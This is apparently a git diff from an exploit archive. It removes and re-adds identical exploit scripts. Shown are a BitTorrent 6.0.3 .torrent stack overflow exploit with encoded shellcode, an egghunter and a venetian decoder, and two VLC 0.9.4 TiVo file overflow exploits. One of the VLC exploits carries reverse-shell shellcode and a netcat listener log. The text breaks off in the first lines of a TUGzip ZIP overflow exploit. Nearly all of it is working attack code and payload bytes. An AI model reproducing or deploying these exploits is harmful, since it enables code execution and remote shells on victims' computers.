#0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #43 INC EBX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #58 POP EAX - #0041 00 ADD BYTE PTR DS:[ECX],AL - "\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 . "\x42\x43" . 
"\x42\x58\x41"; -} - - -sub egghunter -{ - #6A01 PUSH 1 - #5E POP ESI - #4E DEC ESI (=0) - #6A72 PUSH 72 <- starts from 0x00720000 - #56 PUSH ESI - #4C DEC ESP - #4C DEC ESP - #5E POP ESI - #5E POP ESI <- ESI == 0x00720000 - #BA21202120 /MOV EDX,20212021 <- egg - #46 |INC ESI - #3B16 |CMP EDX,DWORD PTR DS:[ESI] - #75FB \JNZ SHORT egghunter - "\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\x16\x75\xFB"; -} - -# this will decode the unicode expanded shellcode pushing it to the stack and the execute it -sub decoder -{ - #46 INC ESI - #6A01 PUSH 1 - #6801010155 PUSH 0x55010101 - #4C DEC ESP - #5B POP EBX - #5B POP EBX - #AD /LODS DWORD PTR DS:[ESI] - #50 |PUSH EAX - #44 |INC ESP - #44 |INC ESP - #44 |INC ESP - #4E |DEC ESI - #4E |DEC ESI - #4E |DEC ESI - #4E |DEC ESI - #4E |DEC ESI - #4E |DEC ESI - #4B |DEC EBX - #83FB01 |CMP EBX,1 - #75EF \JNE SHORT decoder - #54 PUSH ESP - #59 POP ECX - #4C DEC ESP -> realign - #51 PUSH ECX - #C3 RET -"\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3"; -} - -# venetian deccoder + venetian encoded egghunter and decoder -sub venetian_decoder -{ -"\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40". -"\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6". -"\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71". -"\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71". -"\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71". -"\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01". -"\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40". -"\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40". -"\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6". -"\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71". -"\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71". 
-"\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71". -"\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04". -"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04". -"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04". -"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04". -"\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B". -"\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51"; -} - -my $stack_buffer = $ret x 192 . get_eip() . venetian_decoder(); - -open(HANDLE, "> torrent.torrent") || die "Error!\n\n"; -print HANDLE "d8:announce17:http://qwerty.qwe7:comment" . - length($shellcode) .":" . - $shellcode . - "10:created by" . - length($stack_buffer) . ":" . - $stack_buffer . - "13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:". - "\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76\x67\xb8\x65\x65\x0a"; -close (HANDLE); - -# milw0rm.com [2008-10-19] +#!/usr/bin/perl +# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit +# 09/21/2008 by k`sOSe && oVeret + +use warnings; +use strict; + +# If you change this(avoid \x80->\x9f unless you really know what you are doing) you must also change the length value of the decoder +my $shellcode = +# windows/exec CMD="C:\WINDOWS\system32\calc.exe" +#[*] x86/alpha_mixed succeeded, final size 337 +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" . +"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" . +"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" . +"\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" . +"\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" . +"\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" . +"\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" . +"\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" . +"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" . 
+"\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" . +"\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" . +"\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" . +"\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" . +"\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" . +"\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" . +"\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" . +"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" . +"\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" . +"\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" . +"\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" . +"\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" . +"\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" . +"\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" . +"\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" . +"\x41"; + +$shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english windows version ) + +my $ret = "\x3f\x41"; # -> unicode friendly pop,pop,ret + +# unicode friendly get_EIP (needed by the venetian decoder) +sub get_eip +{ + #0041 00 ADD BYTE PTR DS:[ECX],AL + #5F POP EDI + #0041 00 ADD BYTE PTR DS:[ECX],AL + #5F POP EDI + #0041 00 ADD BYTE PTR DS:[ECX],AL + #6A 00 PUSH 0 + #58 POP EAX + #0041 00 ADD BYTE PTR DS:[ECX],AL + #57 PUSH EDI + #0041 00 ADD BYTE PTR DS:[ECX],AL + #54 PUSH ESP + #0041 00 ADD BYTE PTR DS:[ECX],AL + #5A POP EDX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD 
BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #40 INC EAX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #43 INC EBX + #0042 00 ADD BYTE PTR DS:[EDX],AL + #58 POP EAX + #0041 00 ADD BYTE PTR DS:[ECX],AL + "\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 . "\x42\x43" . "\x42\x58\x41"; +} + + +sub egghunter +{ + #6A01 PUSH 1 + #5E POP ESI + #4E DEC ESI (=0) + #6A72 PUSH 72 <- starts from 0x00720000 + #56 PUSH ESI + #4C DEC ESP + #4C DEC ESP + #5E POP ESI + #5E POP ESI <- ESI == 0x00720000 + #BA21202120 /MOV EDX,20212021 <- egg + #46 |INC ESI + #3B16 |CMP EDX,DWORD PTR DS:[ESI] + #75FB \JNZ SHORT egghunter + "\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\x16\x75\xFB"; +} + +# this will decode the unicode expanded shellcode pushing it to the stack and the execute it +sub decoder +{ + #46 INC ESI + #6A01 PUSH 1 + #6801010155 PUSH 0x55010101 + #4C DEC ESP + #5B POP EBX + #5B POP EBX + #AD /LODS DWORD PTR DS:[ESI] + #50 |PUSH EAX + #44 |INC ESP + #44 |INC ESP + #44 |INC ESP + #4E |DEC ESI + #4E |DEC ESI + #4E |DEC ESI + #4E |DEC ESI + #4E |DEC ESI + #4E |DEC ESI + #4B |DEC EBX + #83FB01 |CMP EBX,1 + #75EF \JNE SHORT decoder + #54 PUSH ESP + #59 POP ECX + #4C DEC ESP -> realign + #51 PUSH ECX + #C3 RET +"\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3"; +} + +# venetian deccoder + venetian encoded egghunter and decoder +sub venetian_decoder +{ +"\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40". +"\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6". +"\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71". +"\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71". +"\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71". +"\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01". +"\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40". 
+"\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40". +"\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6". +"\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71". +"\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71". +"\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71". +"\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04". +"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04". +"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04". +"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04". +"\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B". +"\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51"; +} + +my $stack_buffer = $ret x 192 . get_eip() . venetian_decoder(); + +open(HANDLE, "> torrent.torrent") || die "Error!\n\n"; +print HANDLE "d8:announce17:http://qwerty.qwe7:comment" . + length($shellcode) .":" . + $shellcode . + "10:created by" . + length($stack_buffer) . ":" . + $stack_buffer . + "13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:". + "\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76\x67\xb8\x65\x65\x0a"; +close (HANDLE); + +# milw0rm.com [2008-10-19] diff --git a/platforms/windows/local/6798.pl b/platforms/windows/local/6798.pl index fe0071cf1..1dc41fad0 100755 --- a/platforms/windows/local/6798.pl +++ b/platforms/windows/local/6798.pl 
@@ -1,72 +1,72 @@ -#!/usr/bin/perl -# 10/21/2008 k`sOSe - -use warnings; -use strict; - -# windows/exec - 141 bytes -# http://www.metasploit.com -my $shellcode = -"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" . -"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" . -"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" . -"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" . -"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" . -"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" . -"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" . -"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" . -"\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" . -"\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\x2e\x65\x78\x65" . -"\x00"; - -usage() if(!defined(@ARGV) or scalar(@ARGV) < 1 or $ARGV[0] !~ /^\d$/ or $ARGV[0] > 1); - -my @targets = ( - "\x24\x11\x62\x77", # jmp esp @ shell32.dll - Win XP SP1 - "\xb3\x57\x04\x7d" # jmp esp @ shell32.dll - Win XP SP2 - ); - -my $junk = "\x41"; - -open(my $file, "> evil.mpg"); -print $file "\xF5\x46\x7A\xBD" . # TIVO_PES_FILEID - "\x00\x00\x00\x02" . - "\x00\x02\x00\x00" . # CHUNK_SIZE - $junk x 8 . - "\x00\x00\x05\x41" . # i_map_size - $junk x 4 . - "\x00\x00\x05\x49" . # SEQ table size / (i_map_size + 8) == 1 - $junk x 60 . - $targets[$ARGV[0]] . - $shellcode . - $junk x 130835 . - "\x05" . # i_num_recs - $junk x 3 . - "\x05" . # p_hdrs - $junk x 1 . - "\x09" . # subrec_type \ - # (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo) - "\xc0" . # rec_type / - $junk x 14 . - "\x06" . # subrec_type \ - # (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo - "\xe0" . 
# rec_type / - $junk x 531062; - - -sub usage -{ - print < - -targets: - 0 - Windows XP SP1 - 1 - Windows XP SP2 -EOM -exit; -} - -# milw0rm.com [2008-10-21] +#!/usr/bin/perl +# 10/21/2008 k`sOSe + +use warnings; +use strict; + +# windows/exec - 141 bytes +# http://www.metasploit.com +my $shellcode = +"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" . +"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" . +"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" . +"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" . +"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" . +"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" . +"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" . +"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" . +"\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" . +"\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\x2e\x65\x78\x65" . +"\x00"; + +usage() if(!defined(@ARGV) or scalar(@ARGV) < 1 or $ARGV[0] !~ /^\d$/ or $ARGV[0] > 1); + +my @targets = ( + "\x24\x11\x62\x77", # jmp esp @ shell32.dll - Win XP SP1 + "\xb3\x57\x04\x7d" # jmp esp @ shell32.dll - Win XP SP2 + ); + +my $junk = "\x41"; + +open(my $file, "> evil.mpg"); +print $file "\xF5\x46\x7A\xBD" . # TIVO_PES_FILEID + "\x00\x00\x00\x02" . + "\x00\x02\x00\x00" . # CHUNK_SIZE + $junk x 8 . + "\x00\x00\x05\x41" . # i_map_size + $junk x 4 . + "\x00\x00\x05\x49" . # SEQ table size / (i_map_size + 8) == 1 + $junk x 60 . + $targets[$ARGV[0]] . + $shellcode . + $junk x 130835 . + "\x05" . # i_num_recs + $junk x 3 . + "\x05" . # p_hdrs + $junk x 1 . + "\x09" . # subrec_type \ + # (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo) + "\xc0" . # rec_type / + $junk x 14 . + "\x06" . # subrec_type \ + # (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo + "\xe0" . 
# rec_type / + $junk x 531062; + + +sub usage +{ + print < + +targets: + 0 - Windows XP SP1 + 1 - Windows XP SP2 +EOM +exit; +} + +# milw0rm.com [2008-10-21] diff --git a/platforms/windows/local/6825.pl b/platforms/windows/local/6825.pl index 1261414d8..cdf65dc74 100755 --- a/platforms/windows/local/6825.pl +++ b/platforms/windows/local/6825.pl 
@@ -1,90 +1,90 @@ -#!/usr/bin/perl -# 10/23/2008 k`sOSe -# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit -# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k) -# 2 - Works both with a local file and with a remote url -# 3 - VLC do not crash! -# 4 - Enjoy a respawing shell, even if VLC will be closed! -# -# bUGGEd htdocs # nc -l -p 443 -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# e:\Program Files\VideoLAN\VLC>exit -# exit -# bUGGEd htdocs # nc -l -p 443 -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# e:\Program Files\VideoLAN\VLC>exit -# exit -# bUGGEd htdocs # nc -l -p 443 -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# e:\Program Files\VideoLAN\VLC> - -use warnings; -use strict; - -# windows/exec - 141 bytes -# http://www.metasploit.com -my $shellcode = -# windows/shell_reverse_tcp - 287 bytes -# http://www.metasploit.com -# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1 - "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" . - "\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" . - "\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" . - "\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" . - "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" . - "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" . - "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" . - "\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" . - "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" . - "\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" . - "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" . - "\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66\x68\x01\xbb" . - "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" . - "\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" . - "\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" . 
- "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" . - "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" . - "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" . - "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" . - "\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" . - "\x04\x5f\x53\xff\xd6\xff\xd0"; - -my $junk = "\x41"; - -open(my $file, "> evil.mpg"); -print $file "\xF5\x46\x7A\xBD" . # TIVO_PES_FILEID - "\x00\x00\x00\x02" . - "\x00\x02\x00\x00" . # CHUNK_SIZE - $junk x 8 . - "\x00\x00\x05\x41" . # i_map_size - $junk x 4 . - "\x00\x00\x05\x49" . # SEQ table size / (i_map_size + 8) == 1 - $junk x 60 . - "\xb3\x57\x04\x7d" . # jmp esp for winxp sp2.. if it fails SEH will be triggered - $shellcode . - $shellcode . - $junk x (733 - length($shellcode)) . - "\xeb\x06\x90\x90" . # jump ahead - "\x13\x12\x54\x6a" . # pop,pop,ret @ libvlc 0.9.4 - "\xe9\x16\xfd\xff\xff". # jump back - $junk x 129943 . - "\x05" . # i_num_recs - $junk x 3 . - "\x05" . # p_hdrs - $junk x 1 . - "\x09" . # subrec_type \ - # (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo) - "\xc0" . # rec_type / - $junk x 14 . - "\x06" . # subrec_type \ - # (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo - "\xe0" . # rec_type / - $junk x 531062; - -# milw0rm.com [2008-10-23] +#!/usr/bin/perl +# 10/23/2008 k`sOSe +# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit +# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k) +# 2 - Works both with a local file and with a remote url +# 3 - VLC do not crash! +# 4 - Enjoy a respawing shell, even if VLC will be closed! +# +# bUGGEd htdocs # nc -l -p 443 +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# e:\Program Files\VideoLAN\VLC>exit +# exit +# bUGGEd htdocs # nc -l -p 443 +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. 
+# +# e:\Program Files\VideoLAN\VLC>exit +# exit +# bUGGEd htdocs # nc -l -p 443 +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# e:\Program Files\VideoLAN\VLC> + +use warnings; +use strict; + +# windows/exec - 141 bytes +# http://www.metasploit.com +my $shellcode = +# windows/shell_reverse_tcp - 287 bytes +# http://www.metasploit.com +# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1 + "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" . + "\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" . + "\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" . + "\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" . + "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" . + "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" . + "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" . + "\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" . + "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" . + "\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" . + "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" . + "\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66\x68\x01\xbb" . + "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" . + "\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" . + "\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" . + "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" . + "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" . + "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" . + "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" . + "\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" . + "\x04\x5f\x53\xff\xd6\xff\xd0"; + +my $junk = "\x41"; + +open(my $file, "> evil.mpg"); +print $file "\xF5\x46\x7A\xBD" . # TIVO_PES_FILEID + "\x00\x00\x00\x02" . + "\x00\x02\x00\x00" . # CHUNK_SIZE + $junk x 8 . + "\x00\x00\x05\x41" . # i_map_size + $junk x 4 . + "\x00\x00\x05\x49" . 
# SEQ table size / (i_map_size + 8) == 1 + $junk x 60 . + "\xb3\x57\x04\x7d" . # jmp esp for winxp sp2.. if it fails SEH will be triggered + $shellcode . + $shellcode . + $junk x (733 - length($shellcode)) . + "\xeb\x06\x90\x90" . # jump ahead + "\x13\x12\x54\x6a" . # pop,pop,ret @ libvlc 0.9.4 + "\xe9\x16\xfd\xff\xff". # jump back + $junk x 129943 . + "\x05" . # i_num_recs + $junk x 3 . + "\x05" . # p_hdrs + $junk x 1 . + "\x09" . # subrec_type \ + # (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo) + "\xc0" . # rec_type / + $junk x 14 . + "\x06" . # subrec_type \ + # (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo + "\xe0" . # rec_type / + $junk x 531062; + +# milw0rm.com [2008-10-23] diff --git a/platforms/windows/local/6831.cpp b/platforms/windows/local/6831.cpp index 74d5302eb..cd24dde98 100755 --- a/platforms/windows/local/6831.cpp +++ b/platforms/windows/local/6831.cpp 
@@ -1,419 +1,419 @@ -/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow - "If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK) - Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip. - So the payload doesen't always execute,it's just a matter of patience,from 10 - attemps you get success on 2 in the best case.Got 3 more archivers with stack - overflow and heap overflow,I'm bored... I'm looking for a new approach,will see - soon what I'm going to bring you. - "Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa" - Credits go to Stefan Marin or fl0 fl0w :) . - All the best ! - -Registers -EAX 00000000 -ECX 00000064 -EDX 0013F6D0 -EBX 0117ABDC -ESP 0013F6D0 -EBP 45444342 -ESI 0117AF6C -EDI 00D88B1C -EIP 58585858 - -SEH chain of main thread, item 0 - Address=0013F6D0 - SE handler=C9C9C9C9 - -*/ -#include -#include -#include -#include - -#define OFFSET 2504 -#define NOP 2515 -#define shellcode_offset 2535 - - -char file_1[]= - "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68" -"\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A" -"\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66" 